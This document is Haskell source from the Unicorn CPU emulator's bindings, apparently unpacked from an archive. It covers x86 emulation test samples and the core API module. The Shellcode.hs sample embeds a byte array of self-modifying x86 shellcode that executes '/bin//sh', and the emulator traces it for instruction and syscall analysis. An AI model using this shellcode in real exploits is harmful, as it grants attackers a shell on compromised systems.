0xaaaa0000 (2 * 1024 * 1024) [ProtAll] return True hookMemInvalid _ _ _ _ _ _ = return False hookMem64 :: MemoryHook () hookMem64 _ MemRead addr size _ _ = putStrLn $ ">>> Memory is being READ at 0x" ++ showHex addr ++ ", data size = " ++ show size hookMem64 _ MemWrite addr size (Just value) _ = putStrLn $ ">>> Memory is being WRITE at 0x" ++ showHex addr ++ ", data size = " ++ show size ++ ", data value = 0x" ++ showHex value -- Callback for IN instruction (X86) -- This returns the data read from the port hookIn :: InHook () hookIn uc port size _ = do result <- runEmulator $ do eip <- regRead uc X86.Eip emuPutStrLn $ "--- reading from port 0x" ++ showHex port ++ ", size: " ++ show size ++ ", address: 0x" ++ showHex eip case size of -- Read 1 byte to AL 1 -> return 0xf1 -- Read 2 byte to AX 2 -> return 0xf2 -- Read 4 byte to EAX 4 -> return 0xf4 -- Should never reach this _ -> return 0 case result of Right r -> return r Left _ -> return 0 -- Callback for OUT instruction (X86) hookOut :: OutHook () hookOut uc port size value _ = do runEmulator $ do eip <- regRead uc X86.Eip emuPutStrLn $ "--- writing to port 0x" ++ showHex port ++ ", size: " ++ show size ++ ", value: 0x" ++ showHex value ++ ", address: 0x" ++ showHex eip -- Confirm that value is indeed the value of AL/AX/EAX case size of 1 -> do tmp <- regRead uc X86.Al emuPutStrLn $ "--- register value = 0x" ++ showHex tmp 2 -> do tmp <- regRead uc X86.Ax emuPutStrLn $ "--- register value = 0x" ++ showHex tmp 4 -> do tmp <- regRead uc X86.Eax emuPutStrLn $ "--- register value = 0x" ++ showHex tmp -- Should never reach this _ -> return () return () -- Callback for SYSCALL instruction (X86) hookSyscall :: SyscallHook () hookSyscall uc _ = do runEmulator $ do rax <- regRead uc X86.Rax if rax == 0x100 then regWrite uc X86.Rax 0x200 else emuPutStrLn $ "ERROR: was not expecting rax=0x" ++ showHex rax ++ " in syscall" return () testI386 :: IO () testI386 = do putStrLn "Emulate i386 code" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32 -- Initialize machine registers regWrite uc X86.Ecx 0x1234 regWrite uc X86.Edx 0x7890 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock 
() 1 0 -- Tracing all instructions by having @begin > @end codeHookAdd uc hookCode () 1 0 -- Emulate machine code in infinite time let codeLen = codeLength x86Code32 start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" ecx <- regRead uc X86.Ecx edx <- regRead uc X86.Edx emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx -- Read from memory tmp <- memRead uc address 4 emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex address ++ "] = 0x" ++ showHexBS tmp case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err testI386Jump :: IO () testI386Jump = do putStrLn "===================================" putStrLn "Emulate i386 code with jump" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32Jump -- Tracing 1 basic block with customized callback blockHookAdd uc hookBlock () address address -- Tracing 1 instruction at address codeHookAdd uc hookCode () address address -- Emulate machine code in infinite time let codeLen = codeLength x86Code32Jump start uc address (address + codeLen) Nothing Nothing emuPutStrLn ">>> Emulation done. Below is the CPU context" case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err -- Emulate code that loops forever testI386Loop :: IO () testI386Loop = do putStrLn "===================================" putStrLn "Emulate i386 code that loops forever" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated in memory memWrite uc address x86Code32Loop -- Initialize machine registers regWrite uc X86.Ecx 0x1234 regWrite uc X86.Edx 0x7890 -- Emulate machine code in 2 seconds, so we can quit even if the code -- loops let codeLen = codeLength x86Code32Loop start uc address (address + codeLen) (Just $ 2 * 1000000) Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" ecx <- regRead uc X86.Ecx edx <- regRead uc X86.Edx emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err -- Emulate code that reads from invalid memory testI386InvalidMemRead :: IO () testI386InvalidMemRead = do putStrLn "===================================" putStrLn "Emulate i386 code that reads from invalid memory" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32MemRead -- Initialize machine registers regWrite uc X86.Ecx 0x1234 regWrite uc X86.Edx 0x7890 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions by having @begin > @end codeHookAdd uc hookCode () 1 0 -- Emulate machine code in infinite time let codeLen = codeLength x86Code32MemRead start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done.
Below is the CPU context" ecx <- regRead uc X86.Ecx edx <- regRead uc X86.Edx emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err -- Emulate code that writes to invalid memory testI386InvalidMemWrite :: IO () testI386InvalidMemWrite = do putStrLn "===================================" putStrLn "Emulate i386 code that writes to invalid memory" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32MemWrite -- Initialize machine registers regWrite uc X86.Ecx 0x1234 regWrite uc X86.Edx 0x7890 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions by having @begin > @end codeHookAdd uc hookCode () 1 0 -- Intercept invalid memory events memoryEventHookAdd uc HookMemReadUnmapped hookMemInvalid () 1 0 memoryEventHookAdd uc HookMemWriteUnmapped hookMemInvalid () 1 0 -- Emulate machine code in infinite time let codeLen = codeLength x86Code32MemWrite start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" ecx <- regRead uc X86.Ecx edx <- regRead uc X86.Edx emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx -- Read from memory tmp <- memRead uc 0xaaaaaaaa 4 emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex 0xaaaaaaaa ++ "] = 0x" ++ showHexBS tmp tmp <- memRead uc 0xffffffaa 4 emuPutStrLn $ ">>> Read 4 bytes from [0x" ++ showHex 0xffffffaa ++ "] = 0x" ++ showHexBS tmp case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err -- Emulate code that jumps to invalid memory testI386JumpInvalid :: IO () testI386JumpInvalid = do putStrLn "===================================" putStrLn "Emulate i386 code that jumps to invalid memory" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32JmpInvalid -- Initialize machine registers regWrite uc X86.Ecx 0x1234 regWrite uc X86.Edx 0x7890 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions by having @begin > @end codeHookAdd uc hookCode () 1 0 -- Emulate machine code in infinite time let codeLen = codeLength x86Code32JmpInvalid start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done.
Below is the CPU context" ecx <- regRead uc X86.Ecx edx <- regRead uc X86.Edx emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx emuPutStrLn $ ">>> EDX = 0x" ++ showHex edx case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err testI386InOut :: IO () testI386InOut = do putStrLn "===================================" putStrLn "Emulate i386 code with IN/OUT instructions" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32InOut -- Initialize machine registers regWrite uc X86.Eax 0x1234 regWrite uc X86.Ecx 0x6789 -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions codeHookAdd uc hookCode () 1 0 -- uc IN instruction inHookAdd uc hookIn () 1 0 -- uc OUT instruction outHookAdd uc hookOut () 1 0 -- Emulate machine code in infinite time let codeLen = codeLength x86Code32InOut start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" eax <- regRead uc X86.Eax ecx <- regRead uc X86.Ecx emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax emuPutStrLn $ ">>> ECX = 0x" ++ showHex ecx case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err -- Emulate code and save/restore the CPU context testI386ContextSave :: IO () testI386ContextSave = do putStrLn "===================================" putStrLn "Save/restore CPU context in opaque blob" result <- runEmulator $ do -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 8KB memory for this emulation memMap uc address (8 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32Inc -- Initialize machine registers regWrite uc X86.Eax 0x1 -- Emulate machine code in infinite time emuPutStrLn ">>> Running emulation for the first time" let codeLen = codeLength x86Code32Inc start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" eax <- regRead uc X86.Eax emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax -- Allocate and save the CPU context emuPutStrLn ">>> Saving CPU context" context <- contextAllocate uc contextSave uc context -- Emulate machine code again emuPutStrLn ">>> Running emulation for the second time" start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" eax <- regRead uc X86.Eax emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax -- Restore CPU context contextRestore uc context -- Now print out some registers emuPutStrLn ">>> Emulation done. 
Below is the CPU context" eax <- regRead uc X86.Eax emuPutStrLn $ ">>> EAX = 0x" ++ showHex eax case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err testX8664 :: IO () testX8664 = do putStrLn "Emulate x86_64 code" result <- runEmulator $ do -- Initialize emulator in X86-64bit mode uc <- open ArchX86 [Mode64] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code64 -- Initialize machine registers regWrite uc X86.Rsp (fromIntegral address + 0x200000) regWrite uc X86.Rax 0x71f3029efd49d41d regWrite uc X86.Rbx 0xd87b45277f133ddb regWrite uc X86.Rcx 0xab40d1ffd8afc461 regWrite uc X86.Rdx 0x919317b4a733f01 regWrite uc X86.Rsi 0x4c24e753a17ea358 regWrite uc X86.Rdi 0xe509a57d2571ce96 regWrite uc X86.R8 0xea5b108cc2b9ab1f regWrite uc X86.R9 0x19ec097c8eb618c1 regWrite uc X86.R10 0xec45774f00c5f682 regWrite uc X86.R11 0xe17e9dbec8c074aa regWrite uc X86.R12 0x80f86a8dc0f6d457 regWrite uc X86.R13 0x48288ca5671c5492 regWrite uc X86.R14 0x595f72f6e4017f6e regWrite uc X86.R15 0x1efd97aea331cccc -- Tracing all basic blocks with customized callback blockHookAdd uc hookBlock () 1 0 -- Tracing all instructions in the range [address, address+20] codeHookAdd uc hookCode64 () address (address + 20) -- Tracing all memory WRITE access (with @begin > @end) memoryHookAdd uc HookMemWrite hookMem64 () 1 0 -- Tracing all memory READ access (with @begin > @end) memoryHookAdd uc HookMemRead hookMem64 () 1 0 -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength x86Code64 start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done.
Below is the CPU context" rax <- regRead uc X86.Rax rbx <- regRead uc X86.Rbx rcx <- regRead uc X86.Rcx rdx <- regRead uc X86.Rdx rsi <- regRead uc X86.Rsi rdi <- regRead uc X86.Rdi r8 <- regRead uc X86.R8 r9 <- regRead uc X86.R9 r10 <- regRead uc X86.R10 r11 <- regRead uc X86.R11 r12 <- regRead uc X86.R12 r13 <- regRead uc X86.R13 r14 <- regRead uc X86.R14 r15 <- regRead uc X86.R15 emuPutStrLn $ ">>> RAX = 0x" ++ showHex rax emuPutStrLn $ ">>> RBX = 0x" ++ showHex rbx emuPutStrLn $ ">>> RCX = 0x" ++ showHex rcx emuPutStrLn $ ">>> RDX = 0x" ++ showHex rdx emuPutStrLn $ ">>> RSI = 0x" ++ showHex rsi emuPutStrLn $ ">>> RDI = 0x" ++ showHex rdi emuPutStrLn $ ">>> R8 = 0x" ++ showHex r8 emuPutStrLn $ ">>> R9 = 0x" ++ showHex r9 emuPutStrLn $ ">>> R10 = 0x" ++ showHex r10 emuPutStrLn $ ">>> R11 = 0x" ++ showHex r11 emuPutStrLn $ ">>> R12 = 0x" ++ showHex r12 emuPutStrLn $ ">>> R13 = 0x" ++ showHex r13 emuPutStrLn $ ">>> R14 = 0x" ++ showHex r14 emuPutStrLn $ ">>> R15 = 0x" ++ showHex r15 case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err testX8664Syscall :: IO () testX8664Syscall = do putStrLn "===================================" putStrLn "Emulate x86_64 code with 'syscall' instruction" result <- runEmulator $ do -- Initialize emulator in X86-64bit mode uc <- open ArchX86 [Mode64] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code64Syscall -- Hook interrupts for syscall syscallHookAdd uc hookSyscall () 1 0 -- Initialize machine registers regWrite uc X86.Rax 0x100 -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all code let codeLen = codeLength x86Code64Syscall start uc address (address + codeLen) Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. Below is the CPU context" rax <- regRead uc X86.Rax emuPutStrLn $ ">>> RAX = 0x" ++ showHex rax case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err testX8616 :: IO () testX8616 = do putStrLn "Emulate x86 16-bit code" result <- runEmulator $ do -- Initialize emulator in X86-16bit mode uc <- open ArchX86 [Mode16] -- Map 8KB memory for this emulation memMap uc 0 (8 * 1024) [ProtAll] -- Write machine code to be emulated in memory memWrite uc 0 x86Code16 -- Initialize machine registers regWrite uc X86.Eax 7 regWrite uc X86.Ebx 5 regWrite uc X86.Esi 6 -- Emulate machine code in infinite time (last param = Nothing), or -- when finishing all the code let codeLen = codeLength x86Code16 start uc 0 codeLen Nothing Nothing -- Now print out some registers emuPutStrLn ">>> Emulation done. 
Below is the CPU context" -- Read from memory tmp <- memRead uc 11 1 emuPutStrLn $ ">>> Read 1 bytes from [0x" ++ showHex 11 ++ "] = 0x" ++ showHexBS tmp case result of Right _ -> return () Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err main :: IO () main = do progName <- getProgName args <- getArgs case args of ["-32"] -> do testI386 testI386InOut testI386ContextSave testI386Jump testI386Loop testI386InvalidMemRead testI386InvalidMemWrite testI386JumpInvalid ["-64"] -> do testX8664 testX8664Syscall ["-16"] -> testX8616 -- Test memleak ["-0"] -> testI386 _ -> putStrLn $ "Syntax: " ++ progName ++ " <-16|-32|-64>" unicorn-2.1.1/bindings/haskell/samples/Shellcode.hs000066400000000000000000000127461467524106700223400ustar00rootroot00000000000000-- Sample code to trace code with Linux code with syscall import Unicorn import Unicorn.Hook import qualified Unicorn.CPU.X86 as X86 import Control.Monad.Trans.Class (lift) import qualified Data.ByteString as BS import Data.Word import qualified Numeric as N (showHex) import System.Environment -- Code to be emulated x86Code32 :: BS.ByteString x86Code32 = BS.pack [0xeb, 0x19, 0x31, 0xc0, 0x31, 0xdb, 0x31, 0xd2, 0x31, 0xc9, 0xb0, 0x04, 0xb3, 0x01, 0x59, 0xb2, 0x05, 0xcd, 0x80, 0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80, 0xe8, 0xe2, 0xff, 0xff, 0xff, 0x68, 0x65, 0x6c, 0x6c, 0x6f] x86Code32Self :: BS.ByteString x86Code32Self = BS.pack [0xeb, 0x1c, 0x5a, 0x89, 0xd6, 0x8b, 0x02, 0x66, 0x3d, 0xca, 0x7d, 0x75, 0x06, 0x66, 0x05, 0x03, 0x03, 0x89, 0x02, 0xfe, 0xc2, 0x3d, 0x41, 0x41, 0x41, 0x41, 0x75, 0xe9, 0xff, 0xe6, 0xe8, 0xdf, 0xff, 0xff, 0xff, 0x31, 0xd2, 0x6a, 0x0b, 0x58, 0x99, 0x52, 0x68, 0x2f, 0x2f, 0x73, 0x68, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0x53, 0x89, 0xe1, 0xca, 0x7d, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41] -- Memory address where emulation starts address :: Word64 address = 0x1000000 -- Pretty-print integral as hex showHex :: (Integral a, Show a) => a -> String showHex = flip N.showHex "" -- Pretty-print byte string as hex showHexBS :: BS.ByteString -> String showHexBS = concatMap (flip N.showHex " ") . BS.unpack -- Write a string (with a newline character) to standard output in the emulator emuPutStrLn :: String -> Emulator () emuPutStrLn = lift . putStrLn -- Calculate code length codeLength :: Num a => BS.ByteString -> a codeLength = fromIntegral . BS.length -- Callback for tracing instructions hookCode :: CodeHook () hookCode uc addr size _ = do runEmulator $ do emuPutStrLn $ "Tracing instruction at 0x" ++ showHex addr ++ ", instruction size = 0x" ++ (maybe "0" showHex size) eip <- regRead uc X86.Eip tmp <- memRead uc addr (maybe 0 id size) emuPutStrLn $ "*** EIP = " ++ showHex eip ++ " ***: " ++ showHexBS tmp return () -- Callback for handling interrupts -- ref: http://syscalls.kernelgrok.com hookIntr :: InterruptHook () hookIntr uc intno _ | intno == 0x80 = do runEmulator $ do eax <- regRead uc X86.Eax eip <- regRead uc X86.Eip case eax of -- sys_exit 1 -> do emuPutStrLn $ ">>> 0x" ++ showHex eip ++ ": interrupt 0x" ++ showHex intno ++ ", SYS_EXIT. quit!\n" stop uc -- sys_write 4 -> do -- ECX = buffer address ecx <- regRead uc X86.Ecx -- EDX = buffer size edx <- regRead uc X86.Edx -- Read the buffer in buffer <- memRead uc (fromIntegral ecx) (fromIntegral edx) err <- errno uc if err == ErrOk then emuPutStrLn $ ">>> 0x" ++ showHex eip ++ ": interrupt 0x" ++ showHex intno ++ ", SYS_WRITE. 
buffer = 0x" ++ showHex ecx ++ ", size = " ++ show edx ++ ", content = " ++ showHexBS buffer else emuPutStrLn $ ">>> 0x" ++ showHex eip ++ ": interrupt 0x" ++ showHex intno ++ ", SYS_WRITE. buffer = 0x" ++ showHex ecx ++ ", size = " ++ show edx ++ " (cannot get content)" _ -> emuPutStrLn $ ">>> 0x" ++ showHex eip ++ ": interrupt 0x" ++ showHex intno ++ ", EAX = 0x" ++ showHex eax return () | otherwise = return () testI386 :: IO () testI386 = do result <- runEmulator $ do emuPutStrLn "Emulate i386 code" -- Initialize emulator in X86-32bit mode uc <- open ArchX86 [Mode32] -- Map 2MB memory for this emulation memMap uc address (2 * 1024 * 1024) [ProtAll] -- Write machine code to be emulated to memory memWrite uc address x86Code32Self -- Initialize machine registers regWrite uc X86.Esp (fromIntegral address + 0x200000) -- Tracing all instructions by having @begin > @end codeHookAdd uc hookCode () 1 0 -- Handle interrupt ourself interruptHookAdd uc hookIntr () 1 0 emuPutStrLn "\n>>> Start tracing this Linux code" -- Emulate machine code in infinite time let codeLen = codeLength x86Code32Self start uc address (address + codeLen) Nothing Nothing case result of Right _ -> putStrLn "\n>>> Emulation done." Left err -> putStrLn $ "Failed with error " ++ show err ++ ": " ++ strerror err main :: IO () main = do progName <- getProgName args <- getArgs case args of ["-32"] -> testI386 _ -> putStrLn $ "Syntax: " ++ progName ++ " <-32|-64>" unicorn-2.1.1/bindings/haskell/src/000077500000000000000000000000001467524106700172135ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/Unicorn.hs000066400000000000000000000314101467524106700211630ustar00rootroot00000000000000{-| Module : Unicorn Description : The Unicorn CPU emulator. Copyright : (c) Adrian Herrera, 2016 License : GPL-2 Unicorn is a lightweight, multi-platform, multi-architecture CPU emulator framework based on QEMU. Further information is available at . -} module Unicorn ( -- * Emulator control Emulator , Engine , Architecture(..) , Mode(..) , QueryType(..) , runEmulator , open , query , start , stop -- * Register operations , regWrite , regRead , regWriteBatch , regReadBatch -- * Memory operations , MemoryPermission(..) , MemoryRegion(..) , memWrite , memRead , memMap , memUnmap , memProtect , memRegions -- * Context operations , Context , contextAllocate , contextSave , contextRestore -- * Error handling , Error(..) , errno , strerror -- * Misc. , version ) where import Control.Monad (join, liftM) import Control.Monad.Trans.Class (lift) import Control.Monad.Trans.Except (throwE, runExceptT) import Data.ByteString (ByteString, pack) import Foreign import Prelude hiding (until) import Unicorn.Internal.Core import Unicorn.Internal.Unicorn ------------------------------------------------------------------------------- -- Emulator control ------------------------------------------------------------------------------- -- | Run the Unicorn emulator and return a result on success, or an 'Error' on -- failure. runEmulator :: Emulator a -- ^ The emulation code to execute -> IO (Either Error a) -- ^ A result on success, or an 'Error' on -- failure runEmulator = runExceptT -- | Create a new instance of the Unicorn engine. 
open :: Architecture -- ^ CPU architecture -> [Mode] -- ^ CPU hardware mode -> Emulator Engine -- ^ A 'Unicorn' engine on success, or an 'Error' on -- failure open arch mode = do (err, ucPtr) <- lift $ ucOpen arch mode if err == ErrOk then -- Return a pointer to the Unicorn engine if ucOpen completed -- successfully lift $ mkEngine ucPtr else -- Otherwise return the error throwE err -- | Query internal status of the Unicorn engine. query :: Engine -- ^ 'Unicorn' engine handle -> QueryType -- ^ Query type -> Emulator Int -- ^ The result of the query query uc queryType = do (err, result) <- lift $ ucQuery uc queryType if err == ErrOk then pure result else throwE err -- | Emulate machine code for a specific duration of time. start :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Address where emulation starts -> Word64 -- ^ Address where emulation stops (i.e. when this -- address is hit) -> Maybe Int -- ^ Optional duration to emulate code (in -- microseconds). -- If 'Nothing' is provided, continue to emulate -- until the code is finished -> Maybe Int -- ^ Optional number of instructions to emulate. If -- 'Nothing' is provided, emulate all the code -- available, until the code is finished -> Emulator () -- ^ An 'Error' on failure start uc begin until timeout count = do err <- lift $ ucEmuStart uc begin until (maybeZ timeout) (maybeZ count) if err == ErrOk then pure () else throwE err where maybeZ = maybe 0 id -- | Stop emulation (which was started by 'start'). -- This is typically called from callback functions registered by tracing APIs. -- -- NOTE: For now, this will stop execution only after the current block. stop :: Engine -- ^ 'Unicorn' engine handle -> Emulator () -- ^ An 'Error' on failure stop uc = do err <- lift $ ucEmuStop uc if err == ErrOk then pure () else throwE err ------------------------------------------------------------------------------- -- Register operations ------------------------------------------------------------------------------- -- | Write to register. regWrite :: Reg r => Engine -- ^ 'Unicorn' engine handle -> r -- ^ Register to write to -> Int64 -- ^ Value to write to register -> Emulator () -- ^ An 'Error' on failure regWrite uc reg value = do err <- lift $ ucRegWrite uc reg value if err == ErrOk then pure () else throwE err -- | Read register value. regRead :: Reg r => Engine -- ^ 'Unicorn' engine handle -> r -- ^ Register to read from -> Emulator Int64 -- ^ The value read from the register on success, -- or an 'Error' on failure regRead uc reg = do (err, val) <- lift $ ucRegRead uc reg if err == ErrOk then pure val else throwE err -- | Write multiple register values. regWriteBatch :: Reg r => Engine -- ^ 'Unicorn' engine handle -> [r] -- ^ List of registers to write to -> [Int64] -- ^ List of values to write to the registers -> Emulator () -- ^ An 'Error' on failure regWriteBatch uc regs vals = do err <- lift $ ucRegWriteBatch uc regs vals (length regs) if err == ErrOk then pure () else throwE err -- | Read multiple register values. regReadBatch :: Reg r => Engine -- ^ 'Unicorn' engine handle -> [r] -- ^ List of registers to read from -> Emulator [Int64] -- ^ A list of register values on success, -- or an 'Error' on failure regReadBatch uc regs = do -- Allocate an array of the given size let size = length regs join . lift . 
allocaArray size $ \array -> do err <- ucRegReadBatch uc regs array size if err == ErrOk then -- If ucRegReadBatch completed successfully, pack the contents of -- the array into a list and return it liftM pure (peekArray size array) else -- Otherwise return the error return $ throwE err ------------------------------------------------------------------------------- -- Memory operations ------------------------------------------------------------------------------- -- | Write to memory. memWrite :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Starting memory address of bytes to write -> ByteString -- ^ The data to write -> Emulator () -- ^ An 'Error' on failure memWrite uc address bytes = do err <- lift $ ucMemWrite uc address bytes if err == ErrOk then pure () else throwE err -- | Read memory contents. memRead :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Starting memory address to read -- from -> Int -- ^ Size of memory to read (in bytes) -> Emulator ByteString -- ^ The memory contents on success, or -- an 'Error' on failure memRead uc address size = do -- Allocate an array of the given size join . lift . allocaArray size $ \array -> do err <- ucMemRead uc address array size if err == ErrOk then -- If ucMemRead completed successfully, pack the contents of the -- array into a ByteString and return it liftM (pure . pack) (peekArray size array) else -- Otherwise return the error return $ throwE err -- | Map a range of memory. memMap :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Start address of the new memory region to -- be mapped in. This address must be -- aligned to 4KB, or this will return with an -- 'ErrArg' error -> Int -- ^ Size of the new memory region to be mapped -- in. This size must be a multiple of 4KB, or -- this will return with an 'ErrArg' error -> [MemoryPermission] -- ^ Permissions for the newly mapped region -> Emulator () -- ^ An 'Error' on failure memMap uc address size perms = do err <- lift $ ucMemMap uc address size perms if err == ErrOk then pure () else throwE err -- | Unmap a range of memory. memUnmap :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Start address of the memory region to be unmapped. -- This address must be aligned to 4KB, or this will -- return with an 'ErrArg' error -> Int -- ^ Size of the memory region to be modified. This -- must be a multiple of 4KB, or this will return with -- an 'ErrArg' error -> Emulator () -- ^ An 'Error' on failure memUnmap uc address size = do err <- lift $ ucMemUnmap uc address size if err == ErrOk then pure () else throwE err -- | Change permissions on a range of memory. memProtect :: Engine -- ^ 'Unicorn' engine handle -> Word64 -- ^ Start address of the memory region to -- modify. This address must be aligned to -- 4KB, or this will return with an -- 'ErrArg' error -> Int -- ^ Size of the memory region to be -- modified. This size must be a multiple -- of 4KB, or this will return with an -- 'ErrArg' error -> [MemoryPermission] -- ^ New permissions for the mapped region -> Emulator () -- ^ An 'Error' on failure memProtect uc address size perms = do err <- lift $ ucMemProtect uc address size perms if err == ErrOk then pure () else throwE err -- | Retrieve all memory regions mapped by 'memMap'.
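--
-- For example, a sketch that prints every mapped region (using 'lift' from
-- "Control.Monad.Trans.Class" to run IO inside 'Emulator'):
--
-- > regions <- memRegions uc
-- > lift $ mapM_ (\r -> print (mrBegin r, mrEnd r, mrPerms r)) regions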
memRegions :: Engine -- ^ 'Unicorn' engine handle -> Emulator [MemoryRegion] -- ^ A list of memory regions memRegions uc = do (err, regionPtr, count) <- lift $ ucMemRegions uc if err == ErrOk then do regions <- lift $ peekArray count regionPtr pure regions else throwE err ------------------------------------------------------------------------------- -- Context operations ------------------------------------------------------------------------------- -- | Allocate a region that can be used to perform quick save/rollback of the -- CPU context, which includes registers and some internal metadata. Contexts -- may not be shared across engine instances with differing architectures or -- modes. contextAllocate :: Engine -- ^ 'Unicorn' engine handle -> Emulator Context -- ^ A CPU context contextAllocate uc = do (err, contextPtr) <- lift $ ucContextAlloc uc if err == ErrOk then -- Return a CPU context if ucContextAlloc completed successfully lift $ mkContext contextPtr else throwE err -- | Save a copy of the internal CPU context. contextSave :: Engine -- ^ 'Unicorn' engine handle -> Context -- ^ A CPU context -> Emulator () -- ^ An error on failure contextSave uc context = do err <- lift $ ucContextSave uc context if err == ErrOk then pure () else throwE err -- | Restore the current CPU context from a saved copy. contextRestore :: Engine -- ^ 'Unicorn' engine handle -> Context -- ^ A CPU context -> Emulator () -- ^ An error on failure contextRestore uc context = do err <- lift $ ucContextRestore uc context if err == ErrOk then pure () else throwE err ------------------------------------------------------------------------------- -- Misc. ------------------------------------------------------------------------------- -- | Combined API version & major and minor version numbers. Returns a -- hexadecimal number as (major << 8 | minor), which encodes both major and -- minor versions. version :: Int version = ucVersion nullPtr nullPtr -- | Report the 'Error' of the last failed API call. errno :: Engine -- ^ 'Unicorn' engine handle -> Emulator Error -- ^ The last 'Error' code errno = lift . ucErrno -- | Return a string describing the given 'Error'. strerror :: Error -- ^ The 'Error' code -> String -- ^ Description of the error code strerror = ucStrerror unicorn-2.1.1/bindings/haskell/src/Unicorn/000077500000000000000000000000001467524106700206305ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/000077500000000000000000000000001467524106700212575ustar00rootroot00000000000000unicorn-2.1.1/bindings/haskell/src/Unicorn/CPU/Arm.chs000066400000000000000000000011471467524106700225000ustar00rootroot00000000000000{-# LANGUAGE ForeignFunctionInterface #-} {-| Module : 